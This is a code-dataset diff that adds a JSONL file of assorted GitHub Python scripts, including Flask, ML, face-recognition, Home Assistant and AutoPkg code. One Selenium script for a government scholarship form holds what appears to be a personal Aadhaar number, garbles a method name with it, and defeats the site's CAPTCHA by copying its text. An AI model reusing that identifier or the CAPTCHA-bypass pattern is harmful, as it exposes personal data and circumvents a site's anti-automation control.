diff --git "a/436.jsonl" "b/436.jsonl" new file mode 100644--- /dev/null +++ "b/436.jsonl" @@ -0,0 +1,750 @@ +{"seq_id":"11223719401","text":"import os\nimport json\n\nfrom flask import render_template, redirect\nfrom flask.globals import g\nfrom flask.helpers import url_for\n\nfrom app import app\nfrom app.auth import login_required\nfrom app.db import get_db\nfrom app.tasks import (\n read_finish_continue,\n read_start,\n read_next,\n start_parsing,\n should_pause,\n save_state,\n)\nfrom app.tappable import tappable\nfrom app.utils import deserialize_chain, b64encode_id, b64decode_id\n\n\n@app.route(\"/operations\")\n@login_required\ndef operations_index():\n # Page to view all operations under a user\n db = get_db()\n\n operation_ids = map(\n b64encode_id,\n (\n x[\"id\"]\n for x in db.execute(\n \"SELECT id FROM operations WHERE requester_id = ?\", (g.user[\"id\"],)\n ).fetchall()\n ),\n )\n\n operations = {i: url_for(\"operation_info\", operation_id=i) for i in operation_ids}\n return render_template(\"operations/index.html\", operations=operations)\n\n\n@app.route(\"/operations/\")\n@login_required\ndef operation_info(operation_id):\n # Get information about an operation by id\n operation_id = b64decode_id(operation_id)\n db = get_db()\n\n operation = db.execute(\n \"SELECT * FROM operations WHERE id = ?\", (operation_id,)\n ).fetchone()\n\n if operation[\"completion\"] == \"COMPLETED\":\n # Load the result from json file if operation is complete\n with open(operation[\"result_store\"], \"r\") as f:\n result = json.load(f)\n else:\n # Otherwise, result should just be an empty string\n result = \"\"\n return render_template(\n \"operations/operation.html\",\n operation_id=b64encode_id(operation_id),\n status=operation[\"completion\"],\n result=result,\n )\n\n\n@app.route(\"/operations/start\", methods=(\"POST\",))\n@login_required\ndef start():\n # Start a csv reading + parsing operation\n db = get_db()\n\n # Insert a record of the operation and grab its id\n operation_id: int = db.execute(\n \"INSERT INTO operations (requester_id, completion) VALUES (?, ?)\",\n (g.user[\"id\"], \"IN PROGRESS\"),\n ).lastrowid\n\n \"\"\"\n Brief description of the operation\n ----------------------------------\n `read_start` initiates reading from the csv file\n `read_next`, then continues reading from the same file and\n merges its results with the previous read\n `read_finish_continue`, determines whether or not the file has been\n read in full and continues reading accordingly\n\n Once the iterative reading is finished, `start_parsing` is called\n to start the parsing operation\n \"\"\"\n csvpath = os.path.join(app.instance_path, \"MOCK_DATA.csv\")\n # Start the operation, using the usual tappable configuration\n tappable(\n # Chain of data reading + callback to data parsing\n read_start.s(csvpath)\n | read_next.s(csvpath)\n | read_finish_continue.s(start_parsing.s(operation_id), csvpath, operation_id),\n # Function to check whether or not operation should pause\n should_pause.s(operation_id),\n # Pause handler\n save_state.s(operation_id),\n ).delay()\n\n db.commit()\n return redirect(url_for(\"operation_info\", operation_id=b64encode_id(operation_id)))\n\n\n@app.route(\"/operations/pause/\", methods=(\"POST\",))\n@login_required\ndef pause(operation_id):\n # Request an operation to pause\n operation_id = b64decode_id(operation_id)\n db = get_db()\n\n operation = db.execute(\n \"SELECT * FROM operations WHERE id = ?\", (operation_id,)\n ).fetchone()\n\n if operation and operation[\"completion\"] == \"IN PROGRESS\":\n \"\"\"\n Change operation status to \"REQUESTING PAUSE\" - next time\n the `app.tappable.pause_or_continue` task is called - it'll know\n it should pause\n \"\"\"\n db.execute(\n \"\"\"\n UPDATE operations\n SET completion = ?\n WHERE id = ?\n \"\"\",\n (\"REQUESTING PAUSE\", operation_id),\n )\n db.commit()\n return {\"operation_id\": b64encode_id(operation_id), \"success\": True}\n elif not operation:\n return {\n \"operation_id\": b64encode_id(operation_id),\n \"success\": False,\n \"message\": \"Invalid operation ID\",\n }\n else:\n return {\n \"operation_id\": b64encode_id(operation_id),\n \"success\": False,\n \"message\": \"Operation is no longer in progress\",\n }\n\n\n@app.route(\"/operations/resume/\", methods=(\"POST\",))\n@login_required\ndef resume(operation_id):\n # Resume an operation\n operation_id = b64decode_id(operation_id)\n db = get_db()\n\n operation = db.execute(\n \"SELECT * FROM operations WHERE id = ?\", (operation_id,)\n ).fetchone()\n\n if operation and operation[\"completion\"] == \"PAUSED\":\n # Load the remaining workflow and the result (so far)\n with open(operation[\"workflow_store\"]) as f:\n workflow = json.load(f)\n with open(operation[\"result_store\"], \"r\") as f:\n result = json.load(f)\n # Initiate the remaining workflow and pass in the result\n # NOTE: The workflow itself is already tappable so pausing after\n # this point is also possible\n deserialize_chain(workflow).delay(result)\n\n db.execute(\n \"\"\"\n UPDATE operations\n SET completion = ?\n WHERE id = ?\n \"\"\",\n (\"IN PROGRESS\", operation_id),\n )\n db.commit()\n return {\"operation_id\": b64encode_id(operation_id), \"success\": True}\n elif not operation:\n return {\n \"operation_id\": b64encode_id(operation_id),\n \"success\": False,\n \"message\": \"Invalid operation ID\",\n }\n else:\n return {\n \"operation_id\": b64encode_id(operation_id),\n \"success\": False,\n \"message\": \"Operation is not paused\",\n }\n\n\n@app.route(\"/operations/cancel/\", methods=(\"POST\",))\n@login_required\ndef cancel(operation_id):\n # Cancel an operation altogether (only available after pausing)\n operation_id = b64decode_id(operation_id)\n db = get_db()\n\n operation = db.execute(\n \"SELECT * FROM operations WHERE id = ?\", (operation_id,)\n ).fetchone()\n\n if operation and operation[\"completion\"] == \"PAUSED\":\n db.execute(\n \"\"\"\n UPDATE operations\n SET completion = ?\n WHERE id = ?\n \"\"\",\n (\"CANCELLED\", operation_id),\n )\n db.commit()\n return {\"operation_id\": b64encode_id(operation_id), \"success\": True}\n elif not operation:\n return {\n \"operation_id\": b64encode_id(operation_id),\n \"success\": False,\n \"message\": \"Invalid operation ID\",\n }\n else:\n return {\n \"operation_id\": b64encode_id(operation_id),\n \"success\": False,\n \"message\": \"Operation is not paused\",\n }\n","repo_name":"TotallyNotChase/resumable-celery-tasks","sub_path":"app/operations.py","file_name":"operations.py","file_ext":"py","file_size_in_byte":7037,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"43"} +{"seq_id":"12159540808","text":"\"\"\"\nCreated on Sun Nov 18 19:56:10 2018\n\n@author: Guillherme\n\nStacked Autoencoder for denoising images (mnist dataset)\n\nSource: https://blog.keras.io/building-autoencoders-in-keras.html?fbclid=IwAR1g_unok9zikI1bdf4Cox5HX6lxMpW9zbLwX91jhNsYodHLbgL_dZ_BfCM\n\"\"\"\n\nfrom keras.datasets import mnist\nfrom keras.models import Model\nfrom keras.layers import Input, Dense\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n# Obtenção do dataset\n(x_train, _), (x_test, _) = mnist.load_data()\n\n# Normalização\nx_train = x_train.astype('float32') / 255.\nx_test = x_test.astype('float32') / 255.\nx_train = x_train.reshape((len(x_train), np.prod(x_train.shape[1:])))\nx_test = x_test.reshape((len(x_test), np.prod(x_test.shape[1:])))\n\n# Adição do ruído \nnoise_factor = 0.5\nx_train_noisy = x_train + noise_factor * np.random.normal(loc=0.0, scale=1.0, size=x_train.shape) \nx_test_noisy = x_test + noise_factor * np.random.normal(loc=0.0, scale=1.0, size=x_test.shape) \nx_train_noisy = np.clip(x_train_noisy, 0., 1.)\nx_test_noisy = np.clip(x_test_noisy, 0., 1.)\n\n# Plot, Linha 1 imagem original e linha 2 a imagem com ruído\n# Apenas as 10 primeiras imagens\nn = 10 # how many digits we will display\nplt.figure(figsize=(20, 4))\nfor i in range(n):\n # display original\n ax = plt.subplot(2, n, i + 1)\n plt.imshow(x_test[i].reshape(28, 28))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n\n # display noisy\n ax = plt.subplot(2, n, i + 1 + n)\n plt.imshow(x_test_noisy[i].reshape(28, 28))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\nplt.show()\n\ninput_img = Input(shape=(784,))\nencoded = Dense(128, activation='relu')(input_img)\nencoded = Dense(64, activation='relu')(encoded)\nencoded = Dense(32, activation='relu')(encoded)\n\ndecoded = Dense(64, activation='relu')(encoded)\ndecoded = Dense(128, activation='relu')(decoded)\ndecoded = Dense(784, activation='sigmoid')(decoded)\n\n# Modelo\nautoencoder = Model(input_img, decoded)\n# O otimizador ajusta a taxa de aprendizagem\n# A função para calcular o loss é a binary_crossentropy\nautoencoder.compile(optimizer='adadelta', loss='binary_crossentropy')\n\n# Executa o modelo\nautoencoder.fit(x_train_noisy, x_train,\n epochs=100,\n batch_size=256,\n shuffle=True,\n validation_data=(x_test_noisy, x_test))\n\nW = autoencoder.get_weights()\nnp.save('SAE_W.npy', W)\n# A linha abaixo inicializa a rede com os pesos de um treinamento anterior\n#W = np.load('SAE_W.npy')\n#autoencoder.set_weights(W)\n\n# this model maps an input to its encoded representation\n# Encoder, representação em 32 pixels da imagem\nencoder = Model(input_img, encoded)\nencoded_imgs = encoder.predict(x_test)\n\nencoded_input = Input(shape=(32,))\ndecoder = Model(encoded_input, autoencoder.layers[-3](encoded_input))\ndecoded_imgs = decoder.predict(encoded_imgs)\n\nencoded_input = Input(shape=(64,))\ndecoder = Model(encoded_input, autoencoder.layers[-2](encoded_input))\ndecoded_imgs = decoder.predict(decoded_imgs)\n\nencoded_input = Input(shape=(128,))\ndecoder = Model(encoded_input, autoencoder.layers[-1](encoded_input))\ndecoded_imgs = decoder.predict(decoded_imgs)\n\n# PLOT em 3 linhas\n# Linha 1 é a imagem original, linha 2 a imagem com ruído e linha 3 a imagem processada\nn = 10 # how many digits we will display\nplt.figure(figsize=(20, 4))\nfor i in range(n):\n # display original\n ax = plt.subplot(3, n, i + 1)\n plt.imshow(x_test[i].reshape(28, 28))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n\n # display noise\n ax = plt.subplot(3, n, i + 1 + n)\n plt.imshow(x_test_noisy[i].reshape(28, 28))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\n\n # display reconstruction\n ax = plt.subplot(3, n, i + 1 + 2*n)\n plt.imshow(decoded_imgs[i].reshape(28, 28))\n plt.gray()\n ax.get_xaxis().set_visible(False)\n ax.get_yaxis().set_visible(False)\nplt.show()","repo_name":"GuillhermeAmaral/Machine-Learning","sub_path":"mnist_denoising.py","file_name":"mnist_denoising.py","file_ext":"py","file_size_in_byte":4022,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"40856285836","text":"import face_recognition\nimport os\nimport cv2\n\nKNOWN_FACES_DIR =\"known-face\"\nUNKNOWN_FACES_DIR = \"unknown-face\"\nTOLERENCE = 0.6\nFRAME_THICKNESS = 3\nFONT_THICKNESS = 2\nMODEL = \"cnn\" # try using \"hog\"\n\nprint(\"loading known faces\")\n\nknown_faces = []\nknown_names = [\"Justin Beiber\"]\n\n\nfor name in os.listdir(KNOWN_FACES_DIR):\n\tfor filename in os.listdir(f\"{KNOWN_FACES_DIR}\"):\n\t\timage =face_recognition.load_image_file(f\"{KNOWN_FACES_DIR}/{filename}\")\n\t\tencoding = face_recognition.face_encodings(image)[0]\n\t\tknown_faces.append(encoding)\n\t\t#known_names.append(name)\n\n\n\nprint(\"Processing unknown faces\")\nfor filename in os.listdir(UNKNOWN_FACES_DIR):\n\tprint(filename)\n\timage = face_recognition.load_image_file(f\"{UNKNOWN_FACES_DIR}/{filename}\")\n\tlocations = face_recognition.face_locations(image, model=MODEL)\n\tencoding = face_recognition.face_encodings(image, locations)\n\timage = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n\tfor face_encoding, face_locations in zip(encoding, locations):\n\t\tresults = face_recognition.compare_faces(known_faces, face_encoding, TOLERENCE)\n\t\tmatch = None\n\t\tif True in results:\n\t\t\tmatch = known_names[results.index(True)]\n\t\t\tprint(f\"Match found : {match}\")\n\n\t\t\ttop_left = (face_locations[3], face_locations[0])\n\t\t\tbottom_right = (face_locations[1], face_locations[2])\n\n\t\t\tcolor = [0, 255, 0]\n\n\t\t\tcv2.rectangle(image, top_left, bottom_right, color, FRAME_THICKNESS)\n\n\t\t\ttop_left = (face_locations[3], face_locations[2])\n\t\t\tbottom_right = (face_locations[1], face_locations[2]+22)\n\t\t\tcv2.rectangle(image, top_left, bottom_right, color, cv2.FILLED)\n\t\t\tcv2.putText(image, match, (face_locations[3]+10, face_locations[2]+15), cv2.FONT_HERSHEY_COMPLEX, 0.5, (200,200,200), FONT_THICKNESS)\n\tcv2.imshow(filename, image)\n\tcv2.waitKey(0)\n\tcv2.destroyWindow()\n\n\n\n","repo_name":"immu0001/python-face_recognition-library-example","sub_path":"face-rec.py","file_name":"face-rec.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"13511195868","text":"# https://leetcode.com/problems/number-of-good-pairs/\n\nclass Solution:\n def numIdenticalPairs(self, nums: List[int]) -> int:\n d = {}\n for i in nums:\n d[i] = d.get(i, 0) + 1\n \n res = 0\n for i in d:\n res += d[i] * (d[i] - 1)//2\n \n return res","repo_name":"anishrajan25/Leetcode","sub_path":"1512 Number of Good Pairs.py","file_name":"1512 Number of Good Pairs.py","file_ext":"py","file_size_in_byte":313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19482554673","text":"\"\"\"\nSupport for X10 lights using RF comms. \n\nI did this because for some reason one of my devices won't work with the CM11a,\nonly the CM17 \"firecracker\". Heyu already supports this; just needs to be\ncalled with `fon/off` rather than `on/off`\n\"\"\"\nimport logging\nfrom subprocess import CalledProcessError\n\nimport voluptuous as vol\n\nfrom homeassistant.const import (CONF_NAME, CONF_ID, CONF_DEVICES)\nfrom homeassistant.components.light import (\n ATTR_BRIGHTNESS, PLATFORM_SCHEMA)\nfrom homeassistant.components.light.x10 import X10Light, x10_command\nimport homeassistant.helpers.config_validation as cv\n\n_LOGGER = logging.getLogger(__name__)\n\nPLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({\n vol.Required(CONF_DEVICES): vol.All(cv.ensure_list, [\n {\n vol.Required(CONF_ID): cv.string,\n vol.Required(CONF_NAME): cv.string,\n }\n ]),\n})\n\n\nCM15_SINGLETON = None\n\ndef CM15_Factory():\n if CM15_SINGLETON is None:\n CM15_SINGLETON = CM15()\n return CM15_SINGLETON\n \ndef setup_platform(hass, config, add_entities, discovery_info=None):\n \"\"\"Set up the x10 CM15 Light platform.\"\"\"\n\n add_entities(X10CM15Light(light, CM15_Factory()) for light in config[CONF_DEVICES])\n\n\nclass X10CM15Light(X10Light):\n \"\"\"Representation of an X10 RF Light.\"\"\"\n\n def __init__(self, light, CM15):\n \"\"\"Initialize an X10 Light.\"\"\"\n X10Light.__init__(self, light, False)\n self._cm15 = CM15\n\n def turn_on(self, **kwargs):\n \"\"\"Instruct the light to turn on.\"\"\"\n self.send_command(self._id,\"ON\")\n self._brightness = kwargs.get(ATTR_BRIGHTNESS, 255)\n self._state = True\n\n def turn_off(self, **kwargs):\n \"\"\"Instruct the light to turn off.\"\"\"\n self.send_command(self._id,\"OFF\")\n self._state = False\n \n def send_command(self, code, command):\n self._cm15.open()\n self._cm15.sendCommand(code.upper(),command.upper())\n self._cm15.close()\n\n def update(self):\n \"\"\"Fetch update state.\"\"\"\n pass\n","repo_name":"snicker/twohunnid_ha","sub_path":"custom_components/x10cm15/light.py","file_name":"light.py","file_ext":"py","file_size_in_byte":2032,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"26073433964","text":"import Tkinter as tk\n\nclass Tool:\n def __init__(self, id, name, command):\n self.id = str(id)\n self.name = str(name)\n\n # commands\n self.command = command;\n\n # vars\n self.checkVar = tk.IntVar()\n\n def getRadioButton(self, root, var=None, row=0, column=0):\n self.radioButton = tk.Radiobutton(\n root,\n variable=var,\n value=self.id,\n text=self.name,\n command=self.onChange,\n width=8,\n indicatoron=False,\n borderwidth=1\n ).grid(row=row, column=column, sticky=tk.NW)\n\n def getCheckButton(self, root, row=0, column=0):\n self.checkButton = tk.Checkbutton(\n root,\n command=self.onChange,\n variable=self.checkVar,\n text=self.name,\n width=8,\n indicatoron=False,\n borderwidth=1\n ).grid(row=row, column=column, sticky=tk.NW)\n\n def onChange(self):\n self.command(self)\n","repo_name":"meatbags/rotokit","sub_path":"src/tools/tool.py","file_name":"tool.py","file_ext":"py","file_size_in_byte":1006,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"19066035078","text":"# ========================\n# Created by 3P[0]. ;)\n#\n# %%%%%%%%%\n# %% %%\n# %%\n# %% %%\n# %% %% %%\n# %% %% %%\n# %%%%%%\n# %%\n# %%\n#\n# ========================\n\nfrom glob import glob\n\npath = '' # set the path here\ndirectoryPath = path + \"*.\"\nfileExtensions = [\"PHP\"]\nlistOfFiles = []\n\nfor extension in fileExtensions:\n\tlistOfFiles.extend(glob(directoryPath + extension))\n\nfor file in listOfFiles:\n\tprint(\"- Listando arquivos -\")\n\tprint(file)","repo_name":"pauloogliano/list-files-python","sub_path":"list.files.py","file_name":"list.files.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39594463419","text":"#!/usr/local/autopkg/python\n\"\"\"\nSee docstring for WinSignatureVerify class\n\"\"\"\n\nfrom subprocess import check_output, CalledProcessError\nimport re\n\nfrom autopkglib import ( # pylint: disable=import-error,unused-import\n Processor,\n ProcessorError,\n)\n\n__all__ = [\"WinSignatureVerify\"]\n\n\nclass WinSignatureVerify(Processor): # pylint: disable=too-few-public-methods\n \"\"\"\n Requires:\n - https://github.com/mtrojnar/osslsigncode\n \"\"\"\n\n description = __doc__\n input_variables = {\n \"pathname\": {\n \"required\": True,\n \"description\": \"Full file path to verify\"},\n \"expected_subject\": {\n \"required\": False,\n \"description\": \"The expected Signer's Certificate\",\n },\n \"expected_signature\": {\n \"required\": False,\n \"description\": \"The expected CurrentDigitalSignature\",\n },\n }\n output_variables = {\n \"signature_verify\": {\"PASS or FAILED signature verification\"},\n }\n cmd = [\n # for intel\n #\"/usr/local/bin/osslsigncode\",\n \"/opt/homebrew/bin/osslsigncode\",\n \"verify\",\n ]\n cert_info = None\n\n def convert_bytes_to_string(self, bytes_obj):\n \"\"\"Accept a bytes objects and return utf-8 string\"\"\"\n return bytes_obj.decode(\"utf-8\")\n\n def find_pattern_first_match(self, pattern):\n \"\"\"Returns the first specified regex match group\"\"\"\n results = re.search(pattern, self.cert_info)\n try:\n return results.group(1)\n except AttributeError:\n return None\n\n return results.group(1)\n\n def get_cert_digitalsignature(self):\n \"\"\"Searches cert data for matching expected signature and returns\n the match\"\"\"\n expected_signature = self.env[\"expected_signature\"]\n return self.find_pattern_first_match(\n f\"Current DigitalSignature.+: ({expected_signature})\\\\nCa\"\n )\n\n def get_cert_subject(self):\n \"\"\"Searches cert data for matching expected subject and returns\n the match\"\"\"\n expected_subject = self.env[\"expected_subject\"]\n return self.find_pattern_first_match(\n f\"Signer's certificate:\\\\n.+\\\\n.+Subject: ({expected_subject})\\\\n\"\n )\n\n def run_cmd(self):\n \"\"\"Runs a shell command and returns its output, returns None on failure\"\"\"\n full_command = self.cmd + [self.env[\"pathname\"]]\n try:\n return check_output(full_command).decode(\"utf-8\")\n except CalledProcessError:\n return None\n\n def main(self):\n \"\"\"gimme some main\"\"\"\n self.cert_info = self.run_cmd()\n if self.cert_info is not None:\n if self.get_cert_subject() and self.get_cert_digitalsignature():\n self.env[\"signature_verify\"] = \"PASSED\"\n else:\n self.env[\"signature_verify\"] = \"FAILED\"\n\nif __name__ == \"__main__\":\n PROCESSOR = WinSignatureVerify()\n PROCESSOR.execute_shell()","repo_name":"Arequ/autopkg_recipes","sub_path":"SharedProcessors/WinSignatureVerify.py","file_name":"WinSignatureVerify.py","file_ext":"py","file_size_in_byte":2973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"16728169440","text":"import time\nimport random\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support.ui import Select\nfrom selenium.webdriver.common.keys import Keys\n\n# 653614758457\ndelay = 3\nweb = webdriver.Chrome()\nweb.get('http://www.scholarships.punjab.gov.in/')\n\n\nfor _ in range(2):\n registeration = web.find_element_by_id(\"studentreglnk\")\n registeration.click()\n\n\n# selecting quoto\nquota = Select(web.find_element_by_id(\"ddlQuota\"))\nquota.select_by_visible_text('Non-Management Quota')\nprint(\"Success !\")\n\n# entering aadhar number\naadar = web.find_element_by_xpath('//*[@id=\"txtCardno\"]')\naadar.send_keys(input(\"Enter aadhar card number : \"))\nprint(\"Success !\")\n\n# entering DOB number\ndob_is = input(\"Enter Date Of Birth (25/12/2000): \")\nfor _ in range(2):\n dob = web.find_element_by_xpath('//*[@id=\"TxtDOB\"]')\n dob.send_keys(dob_is)\nprint(\"Success !\")\n\n# entering First name\nfirst_name = web.find_element_by_xpath('//*[@id=\"txtFirstName\"]')\nfirst_name.send_keys(input(\"Enter Your First Name : \"))\nprint(\"Success !\")\n\n# entering MIDDLE name\nMIDDLE_name = web.find_element_by_xpath('//*[@id=\"txtMiddleName\"]')\nMIDDLE_name.send_keys(\n input(\"Enter Your MIDDLE Name : (LEAVE EMPTY IF YOU DON'T HAVE ANY)\"))\nprint(\"Success !\")\n\n# entering LAST name\nLAST_name = web.find_element_by_xpath('//*[@id=\"txtSurname\"]')\nLAST_name.send_keys(input(\"Enter Your LAST Name : \"))\nprint(\"Success !\")\n\n# selecting Gender\nGender = Select(web.find_element_by_id(\"ddlGender\"))\nGender.select_by_visible_text(input(\"Enter YOur Gender : \"))\nprint(\"Success !\")\n\n# agree ?\n\nproceed = web.find_element_by_xpath('//*[@id=\"btnconsentAgree\"]')\ntxt = input(\"Type 'Y' if above info is correct else 'N' : \")\nif(txt == 'Y'):\n proceed.click()\n print(\"Success !\")\nelse:\n print(\"Run Script again !\")\n \n# if(web.find_element_by_xpath('//*[@id=\"txtFatherName\"]').is_enabled() == False):\n# web.close()\n# else:\n# entering father name \nfather_name = web.find_element_by_xpath('//*[@id=\"txtFatherName\"]')\nfather_name.send_keys(input(\"Enter YOur Father's Name : \"))\n\n# entering Mother name \nMother_name = web.find_elemen653614758457t_by_xpath('//*[@id=\"txtMotherName\"]')\nMother_name.send_keys(input(\"Enter YOur Mother's Name : \"))\n\n# selecting Religion\nReligion = Select(web.find_element_by_id(\"ddlReligion\"))\nReligion.select_by_visible_text(input(\"Enter YOur Religion (Hindu/Christian/Muslim/Sikhism) : \"))\nprint(\"Success !\")\n\n# selecting Category\nCategory = Select(web.find_element_by_id(\"ddlCategory\"))\nCategory.select_by_visible_text(input(\"Enter YOur Category (SC/OBC) : \"))\nprint(\"Success !\")\n\n# selecting IsDtribes\nIsDtribes = Select(web.find_element_by_id(\"ddlIsDtribes\"))\nIsDtribes.select_by_visible_text(\"No\")\n\n# enter your mobile number\nMobile_Number = web.find_element_by_xpath('//*[@id=\"txtPMobile\"]')\nMobile_Number.send_keys(input(\"Enter YOur 10 digitsMobile Number : \"))\nprint(\"Success !\")\n\n# selecting State\nState = Select(web.find_element_by_id(\"DdlState\"))\nState.select_by_visible_text(input(\"Enter YOur State name : \"))\nprint(\"Success !\")\n\n# enter your Address\nAddress = web.find_element_by_xpath('//*[@id=\"txtAddress\"]')\nAddress.send_keys(input(\"Enter YOur Full Address : \"))\nprint(\"Success !\")\n\n# selecting District\nDistrict = Select(web.find_element_by_id(\"DdlDistrict\"))\nDistrict.select_by_visible_text(input(\"Enter YOur District name : \"))\nprint(\"Success !\")\n\n# enter your PinCode\nPinCode = web.find_element_by_xpath('//*[@id=\"txtPinCode\"]')\nPinCode.send_keys(input(\"Enter YOur Pin Code : \"))\nprint(\"Success !\")\n\n# selecting chkSameAdd\nchkSameAdd = web.find_element_by_id(\"chkSameAdd\").click()\nprint(\"DONE !\")\n\n# Entering Captcha\nelem = web.find_element_by_xpath('//*[@id=\"mainCaptcha\"]')\nelem.send_keys(Keys.CONTROL, 'a') #highlight all in box\nnew_elem = elem.send_keys(Keys.CONTROL, 'c')\nelem_2 = web.find_element_by_xpath('//*[@id=\"txtVerifyCaptcha\"]')\nelem_2.send_keys(Keys.CONTROL, 'v')\nprint(\"SUCCESS !\")\n","repo_name":"amnindersingh12/AUTOMATE-SCHOLARSHIP-REGESTRATION-FORM","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3973,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"6019440927","text":"# pip install pandas\r\n# pip install scikit-learn\r\n\r\n\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport sklearn\r\nimport matplotlib.pyplot as plt\r\nimport seaborn as sns\r\nfrom sklearn.model_selection import train_test_split, GridSearchCV\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.compose import ColumnTransformer\r\nfrom sklearn.pipeline import Pipeline,make_pipeline\r\nfrom sklearn.preprocessing import OneHotEncoder\r\nfrom sklearn.preprocessing import MinMaxScaler\r\nfrom scipy.stats import chi2_contingency\r\n\r\n\r\nfrom tpot import TPOTClassifier \r\nfrom sklearn.neighbors import KNeighborsClassifier\r\n\r\ndata = pd.read_excel(r\"E:\\sunbase\\customer_churn_large_dataset.xlsx\")\r\n\r\n# Data Preprocessing\r\n\r\n# Basic Eda\r\ndata.shape\r\ndata.columns\r\ndata.info()\r\ndata.isnull().sum()\r\ndata.describe()\r\ndata.duplicated().sum() \r\n \r\ndf = data.drop(columns=['CustomerID', 'Name'])\r\ndf['Churn'].value_counts(normalize = True) # Balanced Dataset\r\n\r\n# Detect outliers\r\ncon_var = ['Age', 'Subscription_Length_Months', 'Monthly_Bill', 'Total_Usage_GB']\r\nplt.figure(figsize=(2, 50))\r\nfor i, col in enumerate(con_var, 1):\r\n plt.subplot(len(con_var),1, i)\r\n plt.boxplot(df[col])\r\n plt.title(col)\r\n\r\nfor col in con_var:\r\n plt.figure(figsize=(8, 6)) # Adjust the figure size as needed\r\n plt.hist(df[col], bins=20) # You can adjust the number of bins as needed\r\n plt.title(f'Histogram of {col}')\r\n plt.xlabel(col)\r\n plt.ylabel('Frequency')\r\n plt.show()\r\n \r\n \r\n\r\n# Feature Engineering\r\n\r\n# we can take avg monthly usage as a feature \r\n# add avg monthly data usage\r\ndf['Avg Monthly_Data_Usage'] = df['Total_Usage_GB'] / df['Subscription_Length_Months']\r\n\r\n# we can create age groups\r\nage_bins = [0, 18, 30, 50, float('inf')] # Age ranges\r\nage_labels = ['Teenager', 'Young Adult', 'Adult', 'Senior']\r\n\r\n# Add a new column for age groups\r\ndf['Age_Group'] = pd.cut(df['Age'], bins=age_bins, labels=age_labels)\r\ndf = df.drop(columns = ['Age'])\r\nplt.hist(df['Age_Group'], bins =20)\r\n\r\n# checking feature importance\r\n# correlation of categorical column with target column\r\ncontingency_table = pd.crosstab(df['Gender'], df['Churn'])\r\ncontingency_table\r\nchi2 = chi2_contingency(contingency_table)\r\nchi2 # 'Gender' doesn't have significant impact in target variable\r\ndf = df.drop(columns = ['Gender'])\r\n# arrange columns in order\r\ndf = df[['Age_Group', 'Location', 'Subscription_Length_Months','Avg Monthly_Data_Usage', 'Monthly_Bill', 'Total_Usage_GB', 'Churn' ]]\r\n\r\n# Input and Output Split\r\npredictors = df.drop(columns=['Churn'])\r\ntarget = df['Churn']\r\n\r\n# Splitting data into training and testing data set\r\nx_train, x_test, y_train, y_test = train_test_split(predictors, target, test_size = 0.3, random_state=0)\r\n\r\n# Encoding categorical variables\r\n#x_train['Gender'].value_counts(normalize = True)\r\nx_train['Location'].value_counts(normalize = True)\r\nx_train['Age_Group'].value_counts(normalize = True)\r\n\r\ntrf2 = ColumnTransformer([('ohe', OneHotEncoder(sparse= False, handle_unknown='ignore'),['Location', 'Age_Group'])]\r\n ,remainder= 'passthrough')\r\nencod = trf2.fit_transform(x_train)\r\nencod_df = pd.DataFrame(encod)\r\n\r\n# Apply feature scaling\r\ntrf3 = ColumnTransformer([('scaler', MinMaxScaler(), encod_df.columns[:15])])\r\nscaled = trf3.fit_transform(encod_df)\r\nscaled_df = pd.DataFrame(scaled)\r\n\r\n# Using TPOT classifier to findout the best model\r\ntpot_clf = TPOTClassifier(generations=2, population_size=50, scoring='accuracy', verbosity=2, random_state=1, n_jobs=-1)\r\ntpot_clf.fit(x_train, y_train)\r\ntpot_clf.export('best_model.py')\r\n\r\n#best model from Auto ML\r\nbest_model = KNeighborsClassifier(n_neighbors=18, p=1, weights=\"uniform\")\r\n#best_model.fit(x_train,y_train)\r\n\r\nmodel_pipeline = make_pipeline(trf2,trf3,best_model)\r\nmodel_pipeline.fit(x_train,y_train)\r\n\r\ny_pred = pd.Series(model_pipeline.predict(x_test))\r\ny_train_pred = pd.Series(model_pipeline.predict(x_train))\r\n\r\nfrom sklearn.metrics import accuracy_score\r\n\r\ntest_score = accuracy_score(y_test, y_pred)\r\nprint(test_score)\r\n\r\n\r\ntrain_score = accuracy_score(y_train, y_train_pred)\r\nprint(train_score)\r\n\r\nfrom sklearn.metrics import classification_report\r\nprint(classification_report(y_test,y_pred)) \r\n\r\nimport pickle\r\npickle.dump(model_pipeline,open('model_pipeline1.pkl','wb'))\r\n\r\n# Other MOdel Results \r\n################ Train Random Forest classifier ############################\r\nmodel = RandomForestClassifier(random_state=42)\r\n\r\nmodel_pipeline_1 = make_pipeline(trf2,trf3, model)\r\nmodel_pipeline_1.fit(x_train, y_train)\r\n\r\n# Make predictions on the test set\r\ny_pred_1 = model_pipeline_1.predict(x_test)\r\n\r\n# Evaluate the best model's performance\r\naccuracy = accuracy_score(y_test, y_pred_1)\r\nprint(accuracy)\r\nclassification_rep = 